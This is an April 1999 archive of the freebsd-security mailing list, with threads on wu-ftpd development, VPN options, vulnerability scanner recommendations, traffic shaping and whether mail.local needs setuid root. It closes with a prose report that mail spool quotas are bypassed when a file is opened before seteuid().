pathes (up thru VR17) rolled in, plus additional security fixes. The current VR series is on: ftp://ftp.vr.net/pub/wu-ftpd Soon (when we finish getting organized :-), there will be: http://www.wuftpd.org ftp://ftp.wuftpd.org -coranth ========================================= [gryphon@wuftpd.org, gryphon@freebsd.org] Open Source -- The Only Solution To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 27 10:20:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rapidsite.net (mail.rapidsite.net [207.158.192.62]) by hub.freebsd.org (Postfix) with SMTP id 6168B154D6 for ; Tue, 27 Apr 1999 10:20:33 -0700 (PDT) (envelope-from gryphon@intech.net) Received: from gw1.hway.net (207.158.192.37) by mail.rapidsite.net (RS ver 1.0.2) with SMTP id 7071; Tue, 27 Apr 1999 13:20:25 -0400 (EDT) Message-ID: <3725F30E.71220F1E@intech.net> Date: Tue, 27 Apr 1999 13:25:34 -0400 From: Coranth Gryphon Reply-To: gryphon@intech.net X-Mailer: Mozilla 4.08 [en] (WinNT; I) MIME-Version: 1.0 To: James Wyatt Cc: freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Loop-Detect: 1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt wrote: > I just flat trust the FreeBSD ftpd more than the rest and it does > all I need from it - including multi-anon users and internal ls. ... > considering porting FreeBSDs ftpd to the other two. I know wuftpd is > a great tool and is 'really fixed' now. I know the hole was tiny, but As not everyone might be aware, a new group of people have picked up developement and support for 'wuftpd'. We've got the core of the old 'Academ', 'VR' and 'BERO' people, plus others who have made a lot of contributions over the past couple years. The new line is modelled the same as FreeBSD, with '-stable' and '-dev' (semi-experimental) branches. WU-2.5.0 will be rolling out sometime in May, mainly to finalize the merge of the various lineages. It might be worth letting the two 'camps' (FreeBSD and the new Wu-FTPd) work together, rather than both continuing developement, especially since it seems we're both heading in the same directions. Not that diversity isn't good, but why duplicate all the effort? Anyone know who the point-of-contact for the FreeBSD native 'ftpd' is? -coranth ========================================== [gryphon@freebsd.org, gryphon@wuftpd.org] Open Source -- The Only Solution To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 27 21:10:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1459E14E34 for ; Tue, 27 Apr 1999 21:10:49 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id AAA09208 for ; Wed, 28 Apr 1999 00:10:48 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: freebsd-security@FreeBSD.ORG Subject: Re: VPN Date: Wed, 28 Apr 1999 04:20:57 GMT Message-ID: <37268c76.312300444@mail.sentex.net> References: <001d01be8fe9$71b51f80$6a8266ce@violet.neo.lrun.com> <4.1.19990427095335.0182be90@mail1.dcomm.net> In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 27 Apr 1999 02:32:56 -0400, in sentex.lists.freebsd.misc you wrote: >On Tue, Apr 27, 1999 at 09:55:25AM -0700, Deepwell Internet wrote: >> What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD >> to interact with NT/95 machines running PPTP? > >There was some guy who was making an open source (I forget which licence) >PPTP clone for Unixish machines. Try searching for +pptp +unix on the >web. > >Last I looked at it (4-5 months ago?) it was Not Ready For Prime Time. A >lot can happen in 4-5 months, of course. Doesnt seem to be much happening with the code, but its at http://www.pdos.lcs.mit.edu/~cananian/Projects/PPTP/release/pptp-linux-1.0.2.tar.gz ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 28 12:33:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from pinochet.cityline.ru (pinochet.cityline.ru [195.46.160.34]) by hub.freebsd.org (Postfix) with ESMTP id 4EC4014EDE for ; Wed, 28 Apr 1999 12:33:25 -0700 (PDT) (envelope-from ratebor@cityline.ru) Received: from ppp36-5-94.cityline.ru (ppp36-5-94.cityline.ru [195.46.165.94]) by pinochet.cityline.ru (8.9.2/t/08-Oct-1998) with SMTP id XAA10580 for ; Wed, 28 Apr 1999 23:28:33 +0400 (MSD) Date: Wed, 28 Apr 1999 23:31:10 +0400 From: "Dmitriy V. Bokiy" X-Mailer: The Bat! (v1.31) UNREG Reply-To: "Dmitriy V. Bokiy" X-Priority: 3 (Normal) Message-ID: <10979.990428@cityline.ru> To: freebsd-security@FreeBSD.ORG Subject: Vulnerability Scanner? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, all! Could anyone recommend some vulnerability scanners (system and/or network services)? May be something general like COPS or FreeBSD specific ? Thanks everyone in advance. Dmitriy Bokiy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 28 13:10:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from logatome.micronet.fr (logatome-2.francenet.fr [193.149.96.2]) by hub.freebsd.org (Postfix) with ESMTP id 455E61575C for ; Wed, 28 Apr 1999 13:10:36 -0700 (PDT) (envelope-from Sebastien.Gioria@FranceNet.fr) Received: from gioria.dialup.FranceNet.fr (gioria.dialup.francenet.fr [193.149.106.173]) by logatome.micronet.fr (8.8.8/8.8.8) with ESMTP id WAA13537; Wed, 28 Apr 1999 22:08:37 +0200 (CEST) Received: by gioria.dialup.FranceNet.fr (Postfix, from userid 42) id 366031FFFB; Wed, 28 Apr 1999 22:08:46 +0200 (CEST) Message-ID: <19990428220846.D5407@FranceNet.fr> Date: Wed, 28 Apr 1999 22:08:46 +0200 From: Sebastien GIORIA To: "Dmitriy V. Bokiy" Cc: freebsd-security@freebsd.org Subject: Re: Vulnerability Scanner? Reply-To: Sebastien GIORIA References: <10979.990428@cityline.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <10979.990428@cityline.ru>; from Dmitriy V. Bokiy on Wed, Apr 28, 1999 at 11:31:10PM +0400 Operating-System: Definitely FreeBSD Function: Unix and Security Administrator Organization: FranceNet Postal-Address: 28 Rue Desaix , 75015 PARIS, FRANCE Phone: +33 1 43 92 12 34 Fax: +33 1 43 92 14 45 X-Operating-System: FreeBSD-2.2.8-RELEASE (PAO enabled) on Dell Inspiron 3200 X-URL: http://www.FranceNet.fr -- http://www.freebsd-fr.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 28, 1999 at 11:31:10PM +0400, the keyboard of Dmitriy V. Bokiy write: > > Hi, all! > > Could anyone recommend some vulnerability scanners (system and/or > network services)? May be something general like COPS or FreeBSD specific ? For network, try nessus http://www.nessus.org (Free) or ISS scanner http://www.iss.net (Commercial) S. -- --> Mouse chewed through power cable <-- Sebastien Gioria - FranceNet gioria@francenet.fr Unix && Security Administrator security@francenet.fr Tout FreeBSD en Francais =========> http://www.freebsd-fr.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 29 8:36: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from Samizdat.uucom.com (samizdat.uucom.com [198.202.217.54]) by hub.freebsd.org (Postfix) with ESMTP id 1C92214E7D for ; Thu, 29 Apr 1999 08:35:59 -0700 (PDT) (envelope-from cshenton@uucom.com) Received: (from cshenton@localhost) by Samizdat.uucom.com (8.9.3/8.9.3) id LAA17165; Thu, 29 Apr 1999 11:35:55 -0400 (EDT) To: Sebastien GIORIA Cc: "Dmitriy V. Bokiy" , freebsd-security@FreeBSD.ORG Subject: Re: Vulnerability Scanner? References: <10979.990428@cityline.ru> <19990428220846.D5407@FranceNet.fr> From: Chris Shenton Date: 29 Apr 1999 11:35:55 -0400 In-Reply-To: Sebastien GIORIA's message of "Wed, 28 Apr 1999 22:08:46 +0200" Message-ID: Lines: 10 X-Mailer: Gnus v5.6.45/Emacs 20.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 28 Apr 1999 22:08:46 +0200, Sebastien GIORIA said: Sebastien> For network, try nessus http://www.nessus.org (Free) Sebastien> or ISS scanner http://www.iss.net (Commercial) I've had good experience with Ballista, now from Network Associates as CyberCop Scanner. Runs only on Solaris and NT these days though :-( I use nmap routine to scan networks for open ports, but that doesn't tell you that sendmail-3.14159-pre-alpha-7 has a gaping root hole, etc... It's a great place to start tho. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 29 19: 0:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from xenetserver.harz.de (xenetserver.harz.de [193.159.181.125]) by hub.freebsd.org (Postfix) with ESMTP id 1B35D14CE2 for ; Thu, 29 Apr 1999 19:00:26 -0700 (PDT) (envelope-from frank@vogon.agala.harz.de) Received: (from uucp@localhost) by xenetserver.harz.de (8.9.1/8.9.1) with UUCP id EAA17570 for freebsd-security@freebsd.org; Fri, 30 Apr 1999 04:00:25 +0200 (CEST) Received: (from frank@localhost) by vogon.agala.harz.de (8.9.2/8.8.8) id WAA19126 for freebsd-security@freebsd.org; Thu, 29 Apr 1999 22:30:22 +0200 (CEST) (envelope-from frank) Date: Thu, 29 Apr 1999 22:30:22 +0200 From: "Frank J. Beckmann" To: freebsd-security@freebsd.org Subject: Re: VPN Message-ID: <19990429223021.A18194@vogon.agala.harz.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.94.14i X-Address: Frank J. Beckmann, Steinkampring 16, D-38667 Bad Harzburg X-Phone: +49-5322-80008 X-Fax: +49-5322-80082 X-PGP-Fingerprint: (1024R/66DC397D) = 25 34 D7 8A 69 04 12 CA 6E 55 DD 63 F6 A3 0E 06 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article you wrote: >On Sun, 25 Apr 1999, Andrew Kenneth Milton wrote: > >>Use the skip port. > >I've been told that skip supports only two 40 bit and two 56 bit (des and >rc-something being two of those) as well as SAFER, which has NSA written >all over it. > >Can anyone comment on that? That is true for the version of skip that sun ships outside the USA. AFAIK the version of skip in the ports collection uses up to 128 bits. That's why you can only get it from sun from within the USA. But you can also find it on hacktic. Frank To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 29 19: 0:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from xenetserver.harz.de (xenetserver.harz.de [193.159.181.125]) by hub.freebsd.org (Postfix) with ESMTP id D4F86153D4 for ; Thu, 29 Apr 1999 19:00:31 -0700 (PDT) (envelope-from frank@vogon.agala.harz.de) Received: (from uucp@localhost) by xenetserver.harz.de (8.9.1/8.9.1) with UUCP id EAA17571 for freebsd-security@freebsd.org; Fri, 30 Apr 1999 04:00:30 +0200 (CEST) Received: (from frank@localhost) by vogon.agala.harz.de (8.9.2/8.8.8) id WAA19148 for freebsd-security@freebsd.org; Thu, 29 Apr 1999 22:32:55 +0200 (CEST) (envelope-from frank) Date: Thu, 29 Apr 1999 22:32:54 +0200 From: "Frank J. Beckmann" To: freebsd-security@freebsd.org Subject: Re: VPN Message-ID: <19990429223254.A19140@vogon.agala.harz.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.94.14i X-Address: Frank J. Beckmann, Steinkampring 16, D-38667 Bad Harzburg X-Phone: +49-5322-80008 X-Fax: +49-5322-80082 X-PGP-Fingerprint: (1024R/66DC397D) = 25 34 D7 8A 69 04 12 CA 6E 55 DD 63 F6 A3 0E 06 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD >to interact with NT/95 machines running PPTP? Don't use Microsoft PPTP, see http://www.counterpane.com/. Frank To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 29 22: 0:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from firewall.itsec-debis.de (gatekeeper.itsec-debis.de [195.227.50.26]) by hub.freebsd.org (Postfix) with ESMTP id 9C96114BF8 for ; Thu, 29 Apr 1999 22:00:38 -0700 (PDT) (envelope-from rhs@itsec-debis.de) Received: by firewall.itsec-debis.de œid GAA01197; Fri, 30 Apr 1999 06:51:30 GMT Received: by firewall.itsec-debis.de via smap id xma001195; Fri, 30 Apr 99 06:51:27 GMT Received: by itsec-debis.de id GAA15014; Fri, 30 Apr 1999 06:02:32 +0200 Message-ID: <19990430060232.A14831@merlin.itsec-debis.de> Date: Fri, 30 Apr 1999 06:02:32 +0200 From: Randolf-Heiko Skerka To: freebsd-security@FreeBSD.ORG Subject: Re: Vulnerability Scanner? References: <10979.990428@cityline.ru> <19990428220846.D5407@FranceNet.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 X-Mailer: Mutt 0.91i In-Reply-To: ; from Chris Shenton on Thu, Apr 29, 1999 at 11:35:55AM -0400 Content-Transfer-Encoding: quoted-printable X-MIME-Autoconverted: from 8bit to quoted-printable by itsec-debis.de id GAA15014 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 29, 1999 at 11:35:55AM -0400, Chris Shenton wrote: > I've had good experience with Ballista, now from Network Associates as > CyberCop Scanner. Runs only on Solaris and NT these days though :-( I agree. Ballista/CyberCop is quite nice. But i think NAI republished a Linux version too. Don=B4t know if there is a FreeBSD Version. > I use nmap routine to scan networks for open ports, but that doesn't > tell you that sendmail-3.14159-pre-alpha-7 has a gaping root hole, etc.= .. > It's a great place to start tho. But the reason for this is, that nmap is only a portscanner. Randolf Skerka --=20 +------------------------------------------------------------------------= + | Randolf Skerka debis IT Security Services = | | Tel. +49-228-9841-510 Rabinstrasse 8 = | | Fax. +49-228-9841-60 53111 Bonn = | +------------------------------------------------------------------------= + To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 29 23: 0:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from h2o.riss-telecom.ru (h2o.riss-telecom.ru [212.164.65.131]) by hub.freebsd.org (Postfix) with ESMTP id EE2BD14F96 for ; Thu, 29 Apr 1999 23:00:49 -0700 (PDT) (envelope-from bsdl@h2o.riss-telecom.ru) Received: from localhost (bsdl@localhost) by h2o.riss-telecom.ru (8.8.8/8.8.8) with SMTP id NAA03806; Fri, 30 Apr 1999 13:00:32 +0700 (NSS) (envelope-from bsdl@h2o.riss-telecom.ru) Date: Fri, 30 Apr 1999 13:00:32 +0700 (NSS) From: Vitaly V Belekhov To: GuangChun Wen Cc: freebsd-security@FreeBSD.ORG Subject: Re: Traffic Control in FreeBSD In-Reply-To: <005901be8704$d682fc40$b366b4cb@wen.iisi.co.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! 1. You can use DUMMYNET in 3.0 and hier, but its funcionality not so good as 2. CBQ. On Thu, 15 Apr 1999, GuangChun Wen wrote: > Hi eveyone: > > I wonder if it is possible to using FreeBSD as security gateway, > and implement Traffic control mechanism on it by software? > > I have read rfc1633 and it seems that Traffic control usually > is done in router by the help of hardware.I also heard that Linux-based > router product was on the market.what about FreeBSD? > if general cisco routers have traffic control function? > > can anybody give me some advice? > Best Regards, To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 1:10:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from lart.org.uk (lart.org.uk [194.207.104.22]) by hub.freebsd.org (Postfix) with ESMTP id 56F70158CA for ; Fri, 30 Apr 1999 01:10:00 -0700 (PDT) (envelope-from synak@lart.org.uk) Received: (from root@localhost) by lart.org.uk (8.8.8/8.8.8) id IAA08724; Fri, 30 Apr 1999 08:58:40 +0100 (BST) (envelope-from synak) Date: Fri, 30 Apr 1999 08:58:40 +0100 From: Jay Tribick To: Vitaly V Belekhov Cc: GuangChun Wen , freebsd-security@FreeBSD.ORG Subject: Re: Traffic Control in FreeBSD Message-ID: <19990430085840.C8650@lart.org.uk> References: <005901be8704$d682fc40$b366b4cb@wen.iisi.co.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; "Vitaly V Belekhov" on 30.04.1999 @ 07:00:32 BST Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > 1. You can use DUMMYNET in 3.0 and hier, but its funcionality not > so good as > 2. CBQ. We use http://www.etinc.com/ 's BWMGR device for FreeBSD - works fine and is admin'able from a web page. > > I wonder if it is possible to using FreeBSD as security gateway, > > and implement Traffic control mechanism on it by software? > > > > I have read rfc1633 and it seems that Traffic control usually > > is done in router by the help of hardware.I also heard that Linux-based > > router product was on the market.what about FreeBSD? > > if general cisco routers have traffic control function? > > > > can anybody give me some advice? > > Best Regards, > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Regards, Jay Tribick [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 2:30:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 330B115906 for ; Fri, 30 Apr 1999 02:30:30 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id NAA10596; Fri, 30 Apr 1999 13:30:07 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 30 Apr 1999 13:29:12 +0400 Received: from undisclosed-intranet-sender id xma029240; Fri, 30 Apr 99 13:29:09 +0400 Date: Fri, 30 Apr 1999 13:28:59 +0400 Message-Id: <199904300928.NAA13736@paranoid.eltex.spb.ru> In-Reply-To: <19990430085840.C8650@lart.org.uk> from "Jay Tribick " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: Traffic Control in FreeBSD To: na.nu@na.nu Cc: bsdl@riss-telecom.ru, GuangChun@paranoid.eltex.spb.ru, Wen@paranoid.eltex.spb.ru, , freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Jay Tribick said : > > 1. You can use DUMMYNET in 3.0 and hier, but its funcionality not > > so good as > > 2. CBQ. > > We use http://www.etinc.com/ 's BWMGR device for > FreeBSD - works fine and is admin'able from > a web page. Good thing but it is binary :( _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNyl32aH/mIJW9LeBAQERMgP/T2pdTcFYQrQEB/gmzTGWAFSFf89xoArO DwQTn2fxaoUp1FpEF6uLH0rzAGL0x+PYct4d2eV9Q2dLkpIvu/0NmkeOMC+4WLUl W5kZuzc9fN8HrpiwLkwaLE3ZWInF3pQ/wcsFsQ+m7LYvYlye3BIeXh/NBdGEXkhc 3rS+irxC6sQ= =BAr4 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 6:48:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id 4DF1D15434 for ; Fri, 30 Apr 1999 06:47:20 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es) Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id PAA11100 for ; Fri, 30 Apr 1999 15:47:19 +0200 (MET DST) Date: Fri, 30 Apr 1999 15:47:18 +0200 (MET DST) From: "Pedro J. Lobo" To: freebsd-security@freebsd.org Subject: Does mail.local need to be setuid-root? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, people. I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and telnet server for out students. Recently I noticed that several users were using more disk space than his quotas should allow (!). After a bit of investigation, I have traced down the problem to the mail system. The problem is that you cand send mail to a user that is over quota, and the system will append the new message to its inbox (located in /var/mail, as by default). Indeed, root can append data to a file that belongs to a user that is over quota. As you may see, it is a rather ugly "feature". So, the question is: does /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I use /usr/bin/mail as the local mailer? I also administer an alpha with Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local mailer. TIA, Pedro. -- ------------------------------------------------------------------- Pedro José Lobo Perea Tel: +34 91 336 78 19 Centro de Cálculo Fax: +34 91 331 92 29 E.U.I.T. Telecomunicación e-mail: pjlobo@euitt.upm.es Universidad Politécnica de Madrid Ctra. de Valencia, Km. 7 E-28031 Madrid - España / Spain To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 7:10:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id DDFCC1590D for ; Fri, 30 Apr 1999 07:10:14 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id KAA20439; Fri, 30 Apr 1999 10:09:36 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 30 Apr 1999 10:09:36 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: "Pedro J. Lobo" Cc: freebsd-security@freebsd.org Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 30 Apr 1999, Pedro J. Lobo wrote: > Hello, people. > > I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and > telnet server for out students. Recently I noticed that several users were > using more disk space than his quotas should allow (!). After a bit of > investigation, I have traced down the problem to the mail system. > > The problem is that you cand send mail to a user that is over quota, and > the system will append the new message to its inbox (located in /var/mail, > as by default). Indeed, root can append data to a file that belongs to a > user that is over quota. > > As you may see, it is a rather ugly "feature". So, the question is: does > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I > use /usr/bin/mail as the local mailer? I also administer an alpha with > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local > mailer. The need to setuid for local mail delivery is necessitated by the placement of user-owned mailboxes in a shared directory. Clearly, there are other possible arrangements that would work and not require the effective uid to be root during mail delivery (for example, individual directories, etc). ACLs would also provide a nice solution. Making mail.local setuid is probably safer than making sendmail setuid, as sendmail has more exposure to the world in the common case. Sendmail currently runs as root, but it's easy to imagine, given capabilities, the ability to get rid of that. Someone was floating patches at one point that modify mail.local to observe file system quotas on the mail spool. I suspect a search on the -questions archive will turn it up. They might have been added to the tree, but for some reason I think they weren't. If the author is still around, they might see a post to -hackers, if not here. If they're decent patches, I'd actually really like to see them committed because I have some machines I'd like to do the same thing on. I personally use the Cyrus mail server instead on my larger mail machines. Cyrus provides all kinds of spiffy functionality (including high-performance POP, IMAP, fine-grained locking on IMAP messages, kerberos support, shared mailboxes with ACLs, a management tool, etc). While it isn't the same as having local mail, it's very similar in many environments, and there are a large and growing number of IMAP readers out there. Cyrus is available in the ports collection, but can also be built cleanly without using the port directly from the CMU distribution (my machines were used for this :). I recommend it highly :). The license allows for free use, but commercial redistribution requires negotiating with CMU for a license. Several companies have negotiated licenses and are selling commercial distributions, if you want support for it. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 7:42: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 94A8B14C45 for ; Fri, 30 Apr 1999 07:41:53 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id LAA09081; Fri, 30 Apr 1999 11:37:12 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199904301437.LAA09081@ns1.sminter.com.ar> Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: from Robert Watson at "Apr 30, 99 10:09:36 am" To: robert+freebsd@cyrus.watson.org Date: Fri, 30 Apr 1999 11:37:12 -0300 (GMT) Cc: pjlobo@euitt.upm.es, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Robert Watson escribió: > On Fri, 30 Apr 1999, Pedro J. Lobo wrote: > > > Hello, people. > > > > I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and > > telnet server for out students. Recently I noticed that several users were > > using more disk space than his quotas should allow (!). After a bit of > > investigation, I have traced down the problem to the mail system. > > > > The problem is that you cand send mail to a user that is over quota, and > > the system will append the new message to its inbox (located in /var/mail, > > as by default). Indeed, root can append data to a file that belongs to a > > user that is over quota. > > > > As you may see, it is a rather ugly "feature". So, the question is: does > > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I > > use /usr/bin/mail as the local mailer? I also administer an alpha with > > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local > > mailer. You can use procmail with doesn't need suid. Regards. Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 8:28:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id EC62E14F69 for ; Fri, 30 Apr 1999 08:27:57 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es) Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id RAA17565; Fri, 30 Apr 1999 17:24:52 +0200 (MET DST) Date: Fri, 30 Apr 1999 17:24:51 +0200 (MET DST) From: "Pedro J. Lobo" To: Fernando Schapachnik Cc: robert+freebsd@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-Reply-To: <199904301437.LAA09081@ns1.sminter.com.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 30 Apr 1999, Fernando Schapachnik wrote: >En un mensaje anterior, Robert Watson escribió: >> On Fri, 30 Apr 1999, Pedro J. Lobo wrote: >> >> > As you may see, it is a rather ugly "feature". So, the question is: does >> > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I >> > use /usr/bin/mail as the local mailer? I also administer an alpha with >> > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local >> > mailer. > >You can use procmail with doesn't need suid. Maybe I give it a try. In the meantime, I've done a few more tests, and I don't like too much what I've seen. I have looked at the mail.local code, and it does a seteuid(2) to the recipient's UID. So, why does the system allow it to write over quota? I've written a small test program, and have found this: if you seteuid() and open a file for writing, write() or fwrite() calls will fail (that is, if the effective user is over quota). But, if you open the file, and call seteuid() when the file is already open, then you can write as much data as you want. As mail.local does this (first opens the user's mailbox, then seteuid()'s), the quotas are ignored. I think this is a bug, and that quotas should be checked (and applied) every time you call write() or fwrite() or whatever. Opinions? 